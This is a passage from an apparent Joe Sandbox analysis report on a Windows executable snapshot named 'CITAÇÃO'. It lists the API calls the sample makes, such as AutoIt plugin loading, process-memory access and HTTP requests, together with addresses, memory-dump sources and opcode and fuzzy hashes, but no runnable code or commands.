                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                      • MessageBeep.USER32(00000000), ref: 00460C46
                                                      • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                      • EndDialog.USER32(?,00000001), ref: 00460C83
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                      • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                      • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                      • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                      Similarity
                                                      • API ID: Destroy$DeleteObjectWindow$Icon
                                                      • String ID:
                                                      • API String ID: 4023252218-0
                                                      • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                      • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                      • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                      • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                      APIs
                                                      • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                      Similarity
                                                      • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                      • String ID:
                                                      • API String ID: 1489400265-0
                                                      • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                      • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                      • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                      • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                      APIs
                                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                      • DestroyWindow.USER32(?), ref: 00455728
                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                      Similarity
                                                      • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                      • String ID:
                                                      • API String ID: 1042038666-0
                                                      • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                      • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                      • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                      • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                      • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                      • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                      • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                      APIs
                                                      • __getptd.LIBCMT ref: 0041780F
                                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                      • __getptd.LIBCMT ref: 00417826
                                                      • __amsg_exit.LIBCMT ref: 00417834
                                                      • __lock.LIBCMT ref: 00417844
                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                      Similarity
                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                      • String ID:
                                                      • API String ID: 938513278-0
                                                      • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                      • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                      • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                      • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                      APIs
                                                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                      • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                      • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                      • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                      • ExitThread.KERNEL32 ref: 00413D4E
                                                      • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                      • __freefls@4.LIBCMT ref: 00413D74
                                                      Similarity
                                                      • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                      • String ID:
                                                      • API String ID: 2403457894-0
                                                      • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                      • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                      • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                      • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                      APIs
                                                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                      • ExitThread.KERNEL32 ref: 004151ED
                                                      • __freefls@4.LIBCMT ref: 00415209
                                                      Similarity
                                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                      • String ID:
                                                      • API String ID: 4247068974-0
                                                      • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                      • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                      • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                      • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )$U$\
                                                      • API String ID: 0-3705770531
                                                      • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                      • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                      • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                      • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                      APIs
                                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                      • CoInitialize.OLE32(00000000), ref: 0046E505
                                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                      • CoUninitialize.OLE32 ref: 0046E53D
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 886957087-24824748
                                                      • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                      • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                      • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                      • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                      Strings
                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                      Similarity
                                                      • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                      • API String ID: 708495834-557222456
                                                      • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                      • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                      • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                      • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                      APIs
                                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                      • CoInitialize.OLE32(00000000), ref: 00478442
                                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                      • CoUninitialize.OLE32 ref: 0047863C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 886957087-24824748
                                                      • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                      • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                      • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                      • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                      APIs
                                                        • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                        • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                        • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                        • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                        • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                      • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                      • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                      • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                      • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: \$]$h
                                                      • API String ID: 4104443479-3262404753
                                                      • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                      • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                      • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                      • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                      APIs
                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                      • CloseHandle.KERNEL32(?), ref: 00457E09
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                      • String ID: <$@
                                                      • API String ID: 2417854910-1426351568
                                                      • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                      • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                      • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                      • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 3705125965-3916222277
                                                      • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                      • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                      • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                      • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                      APIs
                                                      • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                      • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                      • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem
                                                      • String ID: 0
                                                      • API String ID: 135850232-4108050209
                                                      • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                      • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                      • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                      • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                      • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                      • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                      • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                      • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                      • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: AU3_GetPluginDetails
                                                      • API String ID: 145871493-4132174516
                                                      • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                      • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                      • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                      • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: SysMonthCal32
                                                      • API String ID: 2326795674-1439706946
                                                      • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                      • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                      • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                      • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
